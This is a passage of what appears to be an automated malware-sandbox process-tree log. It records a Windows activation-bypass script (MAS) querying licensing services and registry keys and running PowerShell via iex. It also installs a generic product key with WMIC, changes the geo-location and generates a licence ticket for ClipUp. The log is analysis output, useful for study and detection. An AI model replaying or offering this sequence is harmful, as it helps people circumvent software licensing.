        
        PID:4916
    - - C:\Windows\System32\sc.exe
        
        sc query Winmgmt
        5⤵
        Launches sc.exe
        
        PID:1052
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DependOnService
        5⤵
        Modifies registry key
        
        PID:3572
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Description
        5⤵
        
        PID:2768
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DisplayName
        5⤵
        
        PID:2944
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:4508
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ImagePath
        5⤵
        
        PID:2000
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ObjectName
        5⤵
        
        PID:60
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Start
        5⤵
        
        PID:1896
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Type
        5⤵
        Modifies registry key
        
        PID:4316
    - - C:\Windows\System32\sc.exe
        
        sc start DoSvc
        5⤵
        Launches sc.exe
        
        PID:808
    - - C:\Windows\System32\sc.exe
        
        sc query DoSvc
        5⤵
        Launches sc.exe
        
        PID:4620
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\DoSvc /v DependOnService
        5⤵
        Modifies registry key
        
        PID:4908
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\DoSvc /v Description
        5⤵
        Modifies registry key
        
        PID:2672
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\DoSvc /v DisplayName
        5⤵
        Modifies registry key
        
        PID:3576
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\DoSvc /v ErrorControl
        5⤵
        
        PID:1244
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\DoSvc /v ImagePath
        5⤵
        
        PID:3432
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\DoSvc /v ObjectName
        5⤵
        Modifies registry key
        
        PID:4580
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\DoSvc /v Start
        5⤵
        
        PID:4784
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\DoSvc /v Type
        5⤵
        Modifies registry key
        
        PID:2964
    - - C:\Windows\System32\sc.exe
        
        sc start UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1996
    - - C:\Windows\System32\sc.exe
        
        sc query UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2792
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v DependOnService
        5⤵
        Modifies registry key
        
        PID:8
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v Description
        5⤵
        
        PID:2604
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v DisplayName
        5⤵
        
        PID:4720
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v ErrorControl
        5⤵
        
        PID:1740
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v ImagePath
        5⤵
        Modifies registry key
        
        PID:828
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v ObjectName
        5⤵
        
        PID:992
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v Start
        5⤵
        
        PID:2648
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v Type
        5⤵
        Modifies registry key
        
        PID:1492
    - - C:\Windows\System32\sc.exe
        
        sc start CryptSvc
        5⤵
        Launches sc.exe
        
        PID:3336
    - - C:\Windows\System32\sc.exe
        
        sc query CryptSvc
        5⤵
        Launches sc.exe
        
        PID:2076
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc /v DependOnService
        5⤵
        Modifies registry key
        
        PID:4520
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc /v Description
        5⤵
        Modifies registry key
        
        PID:1372
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc /v DisplayName
        5⤵
        Modifies registry key
        
        PID:2772
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:4688
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc /v ImagePath
        5⤵
        Modifies registry key
        
        PID:872
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc /v ObjectName
        5⤵
        Modifies registry key
        
        PID:2328
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc /v Start
        5⤵
        Modifies registry key
        
        PID:4588
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc /v Type
        5⤵
        Modifies registry key
        
        PID:4736
    - - C:\Windows\System32\sc.exe
        
        sc start BITS
        5⤵
        Launches sc.exe
        
        PID:3444
    - - C:\Windows\System32\sc.exe
        
        sc query BITS
        5⤵
        Launches sc.exe
        
        PID:1964
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\BITS /v DependOnService
        5⤵
        
        PID:220
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\BITS /v Description
        5⤵
        Modifies registry key
        
        PID:2728
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\BITS /v DisplayName
        5⤵
        Modifies registry key
        
        PID:3400
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\BITS /v ErrorControl
        5⤵
        
        PID:3712
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\BITS /v ImagePath
        5⤵
        Modifies registry key
        
        PID:2932
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\BITS /v ObjectName
        5⤵
        Modifies registry key
        
        PID:2952
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\BITS /v Start
        5⤵
        
        PID:2924
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\BITS /v Type
        5⤵
        Modifies registry key
        
        PID:4712
    - - C:\Windows\System32\sc.exe
        
        sc start TrustedInstaller
        5⤵
        Launches sc.exe
        
        PID:4328
    - - C:\Windows\System32\sc.exe
        
        sc query TrustedInstaller
        5⤵
        Launches sc.exe
        
        PID:1016
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller /v DependOnService
        5⤵
        
        PID:920
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller /v Description
        5⤵
        Modifies registry key
        
        PID:2640
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller /v DisplayName
        5⤵
        
        PID:3580
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:4304
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller /v ImagePath
        5⤵
        Modifies registry key
        
        PID:400
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller /v ObjectName
        5⤵
        
        PID:3340
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller /v Start
        5⤵
        
        PID:1548
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller /v Type
        5⤵
        Modifies registry key
        
        PID:3692
    - - C:\Windows\System32\sc.exe
        
        sc start wuauserv
        5⤵
        Launches sc.exe
        
        PID:2184
    - - C:\Windows\System32\sc.exe
        
        sc query wuauserv
        5⤵
        Launches sc.exe
        
        PID:4472
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v DependOnService
        5⤵
        
        PID:4892
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Description
        5⤵
        
        PID:2984
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v DisplayName
        5⤵
        
        PID:168
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ErrorControl
        5⤵
        Modifies registry key
        
        PID:2232
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ImagePath
        5⤵
        Modifies registry key
        
        PID:64
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v ObjectName
        5⤵
        Modifies registry key
        
        PID:436
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Start
        5⤵
        Modifies registry key
        
        PID:2216
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Type
        5⤵
        Modifies registry key
        
        PID:680
    - - C:\Windows\System32\sc.exe
        
        sc start ClipSVC
        5⤵
        Launches sc.exe
        
        PID:1484
    - - C:\Windows\System32\sc.exe
        
        sc start wlidsvc
        5⤵
        Launches sc.exe
        
        PID:4516
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:1672
    - - C:\Windows\System32\sc.exe
        
        sc start KeyIso
        5⤵
        Launches sc.exe
        
        PID:1896
    - - C:\Windows\System32\sc.exe
        
        sc start LicenseManager
        5⤵
        Launches sc.exe
        
        PID:3004
    - - C:\Windows\System32\sc.exe
        
        sc start Winmgmt
        5⤵
        Launches sc.exe
        
        PID:808
    - - C:\Windows\System32\sc.exe
        
        sc start DoSvc
        5⤵
        Launches sc.exe
        
        PID:60
    - - C:\Windows\System32\sc.exe
        
        sc start UsoSvc
        5⤵
        Launches sc.exe
        
        PID:3760
    - - C:\Windows\System32\sc.exe
        
        sc start CryptSvc
        5⤵
        Launches sc.exe
        
        PID:3564
    - - C:\Windows\System32\sc.exe
        
        sc start BITS
        5⤵
        Launches sc.exe
        
        PID:2140
    - - C:\Windows\System32\sc.exe
        
        sc start TrustedInstaller
        5⤵
        Launches sc.exe
        
        PID:1036
    - - C:\Windows\System32\sc.exe
        
        sc start wuauserv
        5⤵
        Launches sc.exe
        
        PID:1244
    - - C:\Windows\System32\sc.exe
        
        sc config DoSvc start= delayed-auto
        5⤵
        Launches sc.exe
        
        PID:976
    - - C:\Windows\System32\sc.exe
        
        sc config wuauserv start= demand
        5⤵
        Launches sc.exe
        
        PID:240
    - - C:\Windows\System32\sc.exe
        
        sc query ClipSVC
        5⤵
        Launches sc.exe
        
        PID:1628
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:3032
    - - C:\Windows\System32\sc.exe
        
        sc start ClipSVC
        5⤵
        
        PID:4784
    - - C:\Windows\System32\sc.exe
        
        sc query wlidsvc
        5⤵
        Launches sc.exe
        
        PID:1996
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:356
    - - C:\Windows\System32\sc.exe
        
        sc start wlidsvc
        5⤵
        Launches sc.exe
        
        PID:8
    - - C:\Windows\System32\sc.exe
        
        sc query sppsvc
        5⤵
        Launches sc.exe
        
        PID:4320
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:3424
    - - C:\Windows\System32\sc.exe
        
        sc start sppsvc
        5⤵
        Launches sc.exe
        
        PID:2684
    - - C:\Windows\System32\sc.exe
        
        sc query KeyIso
        5⤵
        
        PID:4592
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4884
    - - C:\Windows\System32\sc.exe
        
        sc start KeyIso
        5⤵
        Launches sc.exe
        
        PID:4156
    - - C:\Windows\System32\sc.exe
        
        sc query LicenseManager
        5⤵
        Launches sc.exe
        
        PID:4720
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4832
    - - C:\Windows\System32\sc.exe
        
        sc start LicenseManager
        5⤵
        Launches sc.exe
        
        PID:4144
    - - C:\Windows\System32\sc.exe
        
        sc query Winmgmt
        5⤵
        Launches sc.exe
        
        PID:316
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4924
    - - C:\Windows\System32\sc.exe
        
        sc start Winmgmt
        5⤵
        Launches sc.exe
        
        PID:5112
    - - C:\Windows\System32\sc.exe
        
        sc query DoSvc
        5⤵
        Launches sc.exe
        
        PID:2752
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Start-Service DoSvc
        5⤵
        
        PID:2344
    - - C:\Windows\System32\sc.exe
        
        sc query DoSvc
        5⤵
        Launches sc.exe
        
        PID:796
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:2240
    - - C:\Windows\System32\sc.exe
        
        sc start DoSvc
        5⤵
        Launches sc.exe
        
        PID:4600
    - - C:\Windows\System32\sc.exe
        
        sc query UsoSvc
        5⤵
        
        PID:2924
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4896
    - - C:\Windows\System32\sc.exe
        
        sc start UsoSvc
        5⤵
        Launches sc.exe
        
        PID:876
    - - C:\Windows\System32\sc.exe
        
        sc query CryptSvc
        5⤵
        Launches sc.exe
        
        PID:196
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:2748
    - - C:\Windows\System32\sc.exe
        
        sc start CryptSvc
        5⤵
        Launches sc.exe
        
        PID:2640
    - - C:\Windows\System32\sc.exe
        
        sc query BITS
        5⤵
        Launches sc.exe
        
        PID:4876
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:3396
    - - C:\Windows\System32\sc.exe
        
        sc start BITS
        5⤵
        Launches sc.exe
        
        PID:3088
    - - C:\Windows\System32\sc.exe
        
        sc query TrustedInstaller
        5⤵
        Launches sc.exe
        
        PID:3080
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:3340
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Start-Service TrustedInstaller
        5⤵
        
        PID:360
    - - C:\Windows\System32\sc.exe
        
        sc query TrustedInstaller
        5⤵
        Launches sc.exe
        
        PID:1484
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:680
    - - C:\Windows\System32\sc.exe
        
        sc start TrustedInstaller
        5⤵
        Launches sc.exe
        
        PID:4840
    - - C:\Windows\System32\sc.exe
        
        sc query wuauserv
        5⤵
        Launches sc.exe
        
        PID:4684
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:3212
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Start-Service wuauserv
        5⤵
        
        PID:1048
    - - C:\Windows\System32\sc.exe
        
        sc query wuauserv
        5⤵
        Launches sc.exe
        
        PID:2604
    - - C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        5⤵
        
        PID:4320
    - - C:\Windows\System32\sc.exe
        
        sc start wuauserv
        5⤵
        Launches sc.exe
        
        PID:2684
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo TrustedInstaller-1058 "
        5⤵
        
        PID:4592
    - - C:\Windows\System32\findstr.exe
        
        findstr /i "ClipSVC-1058 sppsvc-1058"
        5⤵
        
        PID:2584
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState
        5⤵
        
        PID:4156
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState
        6⤵
        
        PID:4132
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinPE" /v InstRoot
        5⤵
        
        PID:4832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_49734917.cmd') -split ':wpatest\:.*';iex ($f[1]);" 2>nul
        5⤵
        
        PID:3008
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_49734917.cmd') -split ':wpatest\:.*';iex ($f[1]);"
        6⤵
        
        PID:828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "7" "
        5⤵
        
        PID:1372
    - - C:\Windows\System32\find.exe
        
        find /i "Error Found"
        5⤵
        
        PID:4688
    - - C:\Windows\System32\Dism.exe
        
        DISM /English /Online /Get-CurrentEdition
        5⤵
        Drops file in Windows directory
        
        PID:2344
      - C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\dismhost.exe {DD0821C5-6309-4E5B-AFC3-FB153F4591F8}
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1384
    - - C:\Windows\System32\cmd.exe
        
        cmd /c exit /b -2147467259
        5⤵
        
        PID:4684
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v EditionID 2>nul
        5⤵
        
        PID:2268
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v EditionID
        6⤵
        
        PID:920
    - - C:\Windows\System32\cscript.exe
        
        cscript //nologo C:\Windows\system32\slmgr.vbs /dlv
        5⤵
        
        PID:4620
    - - C:\Windows\System32\cmd.exe
        
        cmd /c exit /b 0
        5⤵
        
        PID:64
    - - C:\Windows\System32\wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get CreationClassName /value
        5⤵
        
        PID:1084
    - - C:\Windows\System32\find.exe
        
        find /i "computersystem"
        5⤵
        
        PID:5016
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "0" "
        5⤵
        
        PID:3704
    - - C:\Windows\System32\findstr.exe
        
        findstr /i "0x800410 0x800440"
        5⤵
        
        PID:3524
    - - C:\Windows\System32\reg.exe
        
        reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedTSReArmed"
        5⤵
        
        PID:4576
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ClipSVC\Volatile\PersistedSystemState"
        5⤵
        
        PID:1852
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm" 2>nul
        5⤵
        
        PID:2768
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm"
        6⤵
        
        PID:2232
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Plugins\Objects\msft:rm/algorithm/hwid/4.0" /f ba02fed39662 /d
        5⤵
        
        PID:3096
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore 2>nul
        5⤵
        
        PID:3732
      - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore
        6⤵
        
        PID:2988
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE" 2>nul
        5⤵
        
        PID:4496
      - C:\Windows\System32\wbem\WMIC.exe
        
        wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE
        6⤵
        
        PID:3396
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$acl = Get-Acl '"C:\Windows\System32\spp\store\2.0"'; if ($acl.Access.Where{ $_.IdentityReference -eq 'NT SERVICE\sppsvc' -and $_.AccessControlType -eq 'Deny' -or $acl.Access.IdentityReference -notcontains 'NT SERVICE\sppsvc'}) {Exit 2}"
        5⤵
        
        PID:3480
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$acl = Get-Acl '"HKLM:\SYSTEM\WPA"'; if ($acl.Access.Where{ $_.IdentityReference -eq 'NT SERVICE\sppsvc' -and $_.AccessControlType -eq 'Deny' -or $acl.Access.IdentityReference -notcontains 'NT SERVICE\sppsvc'}) {Exit 2}"
        5⤵
        
        PID:2772
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$acl = Get-Acl '"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform"'; if ($acl.Access.Where{ $_.IdentityReference -eq 'NT SERVICE\sppsvc' -and $_.AccessControlType -eq 'Deny' -or $acl.Access.IdentityReference -notcontains 'NT SERVICE\sppsvc'}) {Exit 2}"
        5⤵
        
        PID:4884
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v SettingsPageVisibility
        5⤵
        
        PID:1628
    - - C:\Windows\System32\find.exe
        
        find /i "windowsupdate"
        5⤵
        
        PID:4292
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdateSysprepInProgress
        5⤵
        
        PID:3956
    - - C:\Windows\System32\reg.exe
        
        reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate /s
        5⤵
        Modifies registry key
        
        PID:60
    - - C:\Windows\System32\findstr.exe
        
        findstr /i "NoAutoUpdate DisableWindowsUpdateAccess"
        5⤵
        
        PID:3744
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo: TrustedInstaller-1058 "
        5⤵
        
        PID:2952
    - - C:\Windows\System32\find.exe
        
        find /i "wuauserv"
        5⤵
        
        PID:2124
    - - C:\Windows\System32\reg.exe
        
        reg query "HKLM\SOFTWARE\Policies\Microsoft\WindowsStore" /v DisableStoreApps
        5⤵
        
        PID:1896
    - - C:\Windows\System32\find.exe
        
        find /i "0x1"
        5⤵
        
        PID:4684
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "040fa323-92b1-4baf-97a2-5b67feaefddb 0724cb7d-3437-4cb7-93cb-830375d0079d 221a02da-e2a1-4b75-864c-0a4410a33fdf 2c293c26-a45a-4a2a-a350-c69a67097529 2de67392-b7a7-462a-b1ca-108dd189f588 2ffd8952-423e-4903-b993-72a1aa44cf82 30a42c86-b7a0-4a34-8c90-ff177cb2acb7 345a5db0-d94f-4e3b-a0c0-7c42f7bc3ebf 377333b1-8b5d-48d6-9679-1225c872d37c 3df374ef-d444-4494-a5a1-4b0d9fd0e203 3f1afc82-f8ac-4f6c-8005-1d233e606eee 49cd895b-53b2-4dc4-a5f7-b18aa019ad37 4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c 4f3da0d2-271d-4508-ae81-626b60809a38 613d217f-7f13-4268-9907-1662339531cd 62f0c100-9c53-4e02-b886-a3528ddfe7f6 73111121-5638-40f6-bc11-f1d7b0d64300 7a802526-4c94-4bd1-ba14-835a1aca2120 7cb546c0-c7d5-44d8-9a5c-69ecdd782b69 8b351c9c-f398-4515-9900-09df49427262 b0773a15-df3a-4312-9ad2-83d69648e356 bd3762d7-270d-4760-8fb3-d829ca45278a c86d5194-4840-4dae-9c1c-0301003a5ab0 d552befb-48cc-4327-8f39-47d2d94f987c d6eadb3b-5ca8-4a6b-986e-35b550756111 e7a950a2-e548-4f10-bf16-02ec848e0643 ef51e000-2659-4f25-8345-3de70a9cf4c4 fe74f55b-0338-41d6-b267-4a201abe7285 " "
        5⤵
        
        PID:4728
    - - C:\Windows\System32\find.exe
        
        find /i "4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c"
        5⤵
        
        PID:4840
    - - C:\Windows\System32\wbem\WMIC.exe
        
        wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call InstallProductKey ProductKey="VK7JG-NPHTM-C97JM-9MPGT-3V66T"
        5⤵
        
        PID:1544
    - - C:\Windows\System32\cmd.exe
        
        cmd /c exit /b 0
        5⤵
        
        PID:1424
    - - C:\Windows\System32\wbem\WMIC.exe
        
        wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call RefreshLicenseStatus
        5⤵
        
        PID:5104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKCU\Control Panel\International\Geo" /v Name 2>nul
        5⤵
        
        PID:2000
      - C:\Windows\System32\reg.exe
        
        reg query "HKCU\Control Panel\International\Geo" /v Name
        6⤵
        
        PID:4416
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKCU\Control Panel\International\Geo" /v Nation 2>nul
        5⤵
        
        PID:1252
      - C:\Windows\System32\reg.exe
        
        reg query "HKCU\Control Panel\International\Geo" /v Nation
        6⤵
        
        PID:1908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "Set-WinHomeLocation -GeoId 244"
        5⤵
        
        PID:2276
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell.exe [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("""OSMajorVersion=5;OSMinorVersion=1;OSPlatformId=2;PP=0;Pfn=Microsoft.Windows.48.X19-98841_8wekyb3d8bbwe;PKeyIID=465145217131314304264339481117862266242033457260311819664735280;$([char]0)"""))
        5⤵
        
        PID:4628
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("""OSMajorVersion=5;OSMinorVersion=1;OSPlatformId=2;PP=0;Pfn=Microsoft.Windows.48.X19-98841_8wekyb3d8bbwe;PKeyIID=465145217131314304264339481117862266242033457260311819664735280;$([char]0)"""))
        6⤵
        
        PID:2380
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "TwBTAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuAD0ANQA7AE8AUwBNAGkAbgBvAHIAVgBlAHIAcwBpAG8AbgA9ADEAOwBPAFMAUABsAGEAdABmAG8AcgBtAEkAZAA9ADIAOwBQAFAAPQAwADsAUABmAG4APQBNAGkAYwByAG8AcwBvAGYAdAAuAFcAaQBuAGQAbwB3AHMALgA0ADgALgBYADEAOQAtADkAOAA4ADQAMQBfADgAdwBlAGsAeQBiADMAZAA4AGIAYgB3AGUAOwBQAEsAZQB5AEkASQBEAD0ANAA2ADUAMQA0ADUAMgAxADcAMQAzADEAMwAxADQAMwAwADQAMgA2ADQAMwAzADkANAA4ADEAMQAxADcAOAA2ADIAMgA2ADYAMgA0ADIAMAAzADMANAA1ADcAMgA2ADAAMwAxADEAOAAxADkANgA2ADQANwAzADUAMgA4ADAAOwAAAA==" "
        5⤵
        
        PID:3156
    - - C:\Windows\System32\find.exe
        
        find "AAAA"
        5⤵
        
        PID:2092
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Restart-Service ClipSVC
        5⤵
        
        PID:3472
    - - C:\Windows\System32\ClipUp.exe
        
